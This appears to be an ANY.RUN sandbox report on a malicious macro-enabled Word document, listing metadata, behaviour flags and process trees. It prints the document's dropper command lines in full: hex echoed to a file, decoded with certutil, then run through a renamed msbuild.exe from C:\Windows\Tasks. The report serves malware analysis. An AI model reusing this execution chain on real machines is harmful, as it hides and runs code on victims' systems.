General Info

File name

e7090590551db5986537cf5979f7f367b22c1c8231bfa58b032449f15d7c886a.doc

Full analysis
https://app.any.run/tasks/24a834ff-99b3-4eee-83ed-962d174fc49b
Verdict
Malicious activity
Analysis date
6/12/2019, 03:40:09
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

macros

macros-on-open

Indicators:

MIME:
application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info:
Microsoft Word 2007+
MD5

f2c85339676398ff5e8d83204c5a76a3

SHA1

01ddcb30308bcf7ea75feba02eea4b04295ac844

SHA256

e7090590551db5986537cf5979f7f367b22c1c8231bfa58b032449f15d7c886a

SSDEEP

768:/LEPTJ3vrOO3RToQgsmvSz1BSHC0zolScXOl/:GJ3zaQXrq5M/O5

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
60 seconds
Additional time used
none
Fakenet option
off
Heavy Evasion option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (73.0.3683.75)
  • Google Update Helper (1.3.33.23)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 65.0.2 (x86 en-US) (65.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

Application was dropped or rewritten from another process
  • weXfvlHFdeZDapgOMUTXuEy.exe (PID: 1916)
Starts Visual C# compiler
  • weXfvlHFdeZDapgOMUTXuEy.exe (PID: 1916)
Unusual execution from Microsoft Office
  • WINWORD.EXE (PID: 3328)
Starts CMD.EXE for commands execution
  • WINWORD.EXE (PID: 3328)
Removes files from Windows directory
  • cmd.exe (PID: 3656)
Starts CertUtil for decode files
  • cmd.exe (PID: 3656)
Creates files in the Windows directory
  • cmd.exe (PID: 3656)
Starts application from unusual location
  • cmd.exe (PID: 3656)
Executable content was dropped or overwritten
  • cmd.exe (PID: 3656)
Creates files in the user directory
  • WINWORD.EXE (PID: 3328)
Reads Microsoft Office registry keys
  • WINWORD.EXE (PID: 3328)

Find more information about signature artifacts and mapping to the MITRE ATT&CK™ MATRIX in the full report

Static information

TRiD
.docm
|   Word Microsoft Office Open XML Format document (with Macro) (53.6%)
.docx
|   Word Microsoft Office Open XML Format document (24.2%)
.zip
|   Open Packaging Conventions container (18%)
.zip
|   ZIP compressed archive (4.1%)
EXIF
ZIP
ZipRequiredVersion:
20
ZipBitFlag:
0x0006
ZipCompression:
Deflated
ZipModifyDate:
1980:01:01 00:00:00
ZipCRC:
0x7aec387e
ZipCompressedSize:
391
ZipUncompressedSize:
1453
ZipFileName:
[Content_Types].xml
XMP
Title:
null
Subject:
null
Creator:
alizee
Description:
null
XML
Keywords:
null
LastModifiedBy:
alizee
RevisionNumber:
3
CreateDate:
2019:05:08 18:20:00Z
ModifyDate:
2019:05:08 18:29:00Z
Template:
Normal.dotm
TotalEditTime:
7 minutes
Pages:
1
Words:
null
Characters:
null
Application:
Microsoft Office Word
DocSecurity:
None
Lines:
null
Paragraphs:
null
ScaleCrop:
No
Company:
null
LinksUpToDate:
No
CharactersWithSpaces:
null
SharedDoc:
No
HyperlinksChanged:
No
AppVersion:
16

Processes

Total processes
43
Monitored processes
10
Malicious processes
1
Suspicious processes
2

Behavior graph

Graph nodes, in order, each marked "no specs" in the report:

  • start
  • drop and start
  • winword.exe
  • cmd.exe
  • cmd.exe
  • certutil.exe
  • wexfvlhfdezdapgomutxuey.exe
  • csc.exe
  • cvtres.exe
  • csc.exe
  • cvtres.exe
  • calc.exe

Process information


PID
3328
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\e7090590551db5986537cf5979f7f367b22c1c8231bfa58b032449f15d7c886a.doc"
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\user32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\apphelp.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\uxtheme.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\winspool.drv
c:\windows\system32\shell32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\program files\common files\microsoft shared\textconv\wpft532.cnv
c:\program files\common files\microsoft shared\textconv\msconv97.dll
c:\program files\common files\microsoft shared\textconv\wpft632.cnv
c:\program files\common files\microsoft shared\textconv\recovr32.cnv
c:\program files\common files\microsoft shared\textconv\wks9pxy.cnv
c:\windows\system32\userenv.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\sxs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\wbem\wbemdisp.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbem\wmiutils.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll

PID
1928
CMD
"C:\Windows\System32\cmd.exe" /c "cd \Users\admin\Appdata\Local\Temp\ && del LKyigCFSSVDvtJb && del UpLkHEF && echo 3c50726f6a65637420546f6f6c7356657273696f6e3d22342e302220786d6c6e733d22687474703a2f2f736368656d61732e6d6963726f736f66742e636f6d2f646576656c6f7065722f6d736275696c642f32303033223e0a20203c546172676574204e616d653d224d537247554b75584b6868555363455a58424a7a4b6161223e0a2020203c4d537247554b75584b6868555363455a58424a7a4b6161202f3e0a2020203c594e774670566d654e4e4250454c6452202f3e0a2020203c2f5461726765743e0a20203c5573696e675461736b0a202020205461736b4e616d653d224d537247554b75584b6868555363455a58424a7a4b6161220a202020205461736b466163746f72793d22436f64655461736b466163746f7279220a20202020417373656d626c7946696c653d22433a5c57696e646f77735c4d6963726f736f66742e4e65745c4672616d65776f726b5c76342e302e33303331395c4d6963726f736f66742e4275696c642e5461736b732e76342e302e646c6c22203e0a202020203c506172616d6574657247726f75702f3e0a202020203c5461736b3e0a2020202020203c5573696e67204e616d6573706163653d2253797374656d22202f3e0a0920203c5573696e67204e616d6573706163653d2253797374656d2e494f22202f3e0a2020202020203c436f646520547970653d22467261676d656e74 >> LKyigCFSSVDvtJb && echo [hex chunk elided] >> LKyigCFSSVDvtJb && echo [hex chunk elided] >> LKyigCFSSVDvtJb && echo [hex chunk elided] >> LKyigCFSSVDvtJb && echo [hex chunk elided] >> LKyigCFSSVDvtJb && echo [hex chunk elided] >> LKyigCFSSVDvtJb && echo [hex chunk elided] >> LKyigCFSSVDvtJb"
Path
C:\Windows\System32\cmd.exe
Indicators
No indicators
Parent process
WINWORD.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
3656
CMD
"C:\Windows\System32\cmd.exe" /k "cd \Users\admin\Appdata\Local\Temp\ && echo [hex chunk elided] >> LKyigCFSSVDvtJb && echo [hex chunk elided] >> LKyigCFSSVDvtJb && echo [hex chunk elided] >> LKyigCFSSVDvtJb && echo [hex chunk elided] >> LKyigCFSSVDvtJb && echo 0a20202020202020205d5d3e0a2020202020203c2f436f64653e0a202020203c2f5461736b3e0a20203c2f5573696e675461736b3e0a3c2f50726f6a6563743e0a >> LKyigCFSSVDvtJb && certutil -decodehex LKyigCFSSVDvtJb UpLkHEF && copy C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Windows\Tasks\weXfvlHFdeZDapgOMUTXuEy.exe && C:\Windows\Tasks\weXfvlHFdeZDapgOMUTXuEy.exe UpLkHEF && del C:\Windows\Tasks\weXfvlHFdeZDapgOMUTXuEy.exe && del UpLkHEF && del LKyigCFSSVDvtJb"
Path
C:\Windows\System32\cmd.exe
Indicators
Parent process
WINWORD.EXE
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\tasks\wexfvlhfdezdapgomutxuey.exe

PID
3264
CMD
certutil -decodehex LKyigCFSSVDvtJb UpLkHEF
Path
C:\Windows\system32\certutil.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
CertUtil.exe
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\certutil.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\certcli.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\wldap32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\cryptui.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\logoncli.dll
c:\windows\system32\dsrole.dll
c:\windows\system32\samcli.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\version.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
1916
CMD
C:\Windows\Tasks\weXfvlHFdeZDapgOMUTXuEy.exe UpLkHEF
Path
C:\Windows\Tasks\weXfvlHFdeZDapgOMUTXuEy.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
MSBuild.exe
Version
4.6.1055.0 built by: NETFXREL2
Modules
Image
c:\windows\tasks\wexfvlhfdezdapgomutxuey.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v4.0.30319\clr.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\mscorlib\225759bb87c854c0fff27b1d84858c21\mscorlib.ni.dll
c:\windows\system32\ole32.dll
c:\windows\system32\cryptbase.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system\52cca48930e580e3189eac47158c20be\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.core\55560c2014611e9119f99923c9ebdeef\system.core.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\msbuild\9f72a8d78d2fc6ba5a2ab3c929570970\msbuild.ni.exe
c:\windows\assembly\nativeimages_v4.0.30319_32\system.configuration\46957030830964165644b52b0696c5d9\system.configuration.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.b3325a29b#\3e3842d4bcde91f8b208fb72edee26fa\microsoft.build.framework.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.build\06c99c802a5a23f7f88e7e8fc74947cf\microsoft.build.ni.dll
c:\windows\microsoft.net\framework\v4.0.30319\nlssorting.dll
c:\windows\microsoft.net\assembly\gac_msil\microsoft.build\v4.0_4.0.0.0__b03f5f7f11d50a3a\microsoft.build.dll
c:\windows\system32\shell32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.ifcaec084#\1cb6bce8581c143f10381abf1f015a1b\microsoft.internal.tasks.dataflow.ni.dll
c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.xml\d86b080a37c60a872c82b912a2a63dac\system.xml.ni.dll
c:\windows\microsoft.net\framework\v4.0.30319\microsoft.build.tasks.v4.0.dll
c:\windows\microsoft.net\assembly\gac_msil\microsoft.build.tasks.v4.0\v4.0_4.0.0.0__b03f5f7f11d50a3a\microsoft.build.tasks.v4.0.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.baa2ca56b#\c5780fb3b27e8923876e7cb311b1f338\microsoft.build.tasks.v4.0.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.b83e9cb53#\761de11ec39160feee337c17175028db\microsoft.build.utilities.v4.0.ni.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\apphelp.dll
c:\windows\microsoft.net\framework\v4.0.30319\csc.exe
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\gac_msil\microsoft.powershell.commands.diagnostics\1.0.0.0__31bf3856ad364e35\microsoft.powershell.commands.diagnostics.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.confe64a9051#\ecc5bbc5c2734b2451ced2f668f40911\system.configuration.install.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.management\1.0.0.0__31bf3856ad364e35\microsoft.wsman.management.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.transactions\e7044d177c8e852b85908d2702898ec8\system.transactions.ni.dll
c:\windows\microsoft.net\assembly\gac_32\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\gac_msil\microsoft.powershell.commands.utility\1.0.0.0__31bf3856ad364e35\microsoft.powershell.commands.utility.dll
c:\windows\assembly\gac_msil\microsoft.powershell.consolehost\1.0.0.0__31bf3856ad364e35\microsoft.powershell.consolehost.dll
c:\windows\assembly\gac_msil\microsoft.powershell.commands.management\1.0.0.0__31bf3856ad364e35\microsoft.powershell.commands.management.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.management\4dfa27fdd6a4cce26f99585e1c744f9b\system.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.serv759bfb78#\86909e4c4c7deb51e42b8f335c7aaa77\system.serviceprocess.ni.dll
c:\windows\assembly\gac_msil\microsoft.powershell.security\1.0.0.0__31bf3856ad364e35\microsoft.powershell.security.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.dired13b18a9#\34fd28526bdd6ec1e9f0d0776062fbbb\system.directoryservices.ni.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.data\032f5fa875be86b577722ddeeee2e51c\system.data.ni.dll
c:\windows\microsoft.net\assembly\gac_32\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll

PID
1136
CMD
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\sbfymty2.cmdline"
Path
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Indicators
No indicators
Parent process
weXfvlHFdeZDapgOMUTXuEy.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Visual C# Command Line Compiler
Version
4.6.1055.0 built by: NETFXREL2
Modules
Image
c:\windows\microsoft.net\framework\v4.0.30319\csc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework\v4.0.30319\alink.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v4.0.30319\clr.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscorpehost.dll
c:\windows\microsoft.net\framework\v4.0.30319\diasymreader.dll
c:\windows\system32\apphelp.dll
c:\windows\microsoft.net\framework\v4.0.30319\cvtres.exe

PID
2992
CMD
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES41F.tmp" "c:\Users\admin\AppData\Local\Temp\CSC62941A302B5744F3BCDAF94F24BED6.TMP"
Path
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Indicators
No indicators
Parent process
csc.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft® Resource File To COFF Object Conversion Utility
Version
12.00.52512.0 built by: VSWINSERVICING
Modules
Image
c:\windows\microsoft.net\framework\v4.0.30319\cvtres.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\cryptbase.dll

PID
676
CMD
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\mxq0ngbg.cmdline"
Path
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Indicators
No indicators
Parent process
weXfvlHFdeZDapgOMUTXuEy.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Visual C# Command Line Compiler
Version
4.6.1055.0 built by: NETFXREL2
Modules
Image
c:\windows\microsoft.net\framework\v4.0.30319\csc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework\v4.0.30319\alink.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v4.0.30319\clr.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscorpehost.dll
c:\windows\microsoft.net\framework\v4.0.30319\diasymreader.dll
c:\windows\system32\apphelp.dll

PID
3856
CMD
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES596.tmp" "c:\Users\admin\AppData\Local\Temp\CSCF85D058A7E984FFE93CC9BB1D9A5AF.TMP"
Path
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Indicators
No indicators
Parent process
csc.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft® Resource File To COFF Object Conversion Utility
Version
12.00.52512.0 built by: VSWINSERVICING
Modules
Image
c:\windows\microsoft.net\framework\v4.0.30319\cvtres.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\cryptbase.dll

PID
1152
CMD
"C:\Windows\system32\calc.exe"
Path
C:\Windows\system32\calc.exe
Indicators
No indicators
Parent process
weXfvlHFdeZDapgOMUTXuEy.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Windows Calculator
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\calc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\shell32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\ole32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\oleaut32.dll
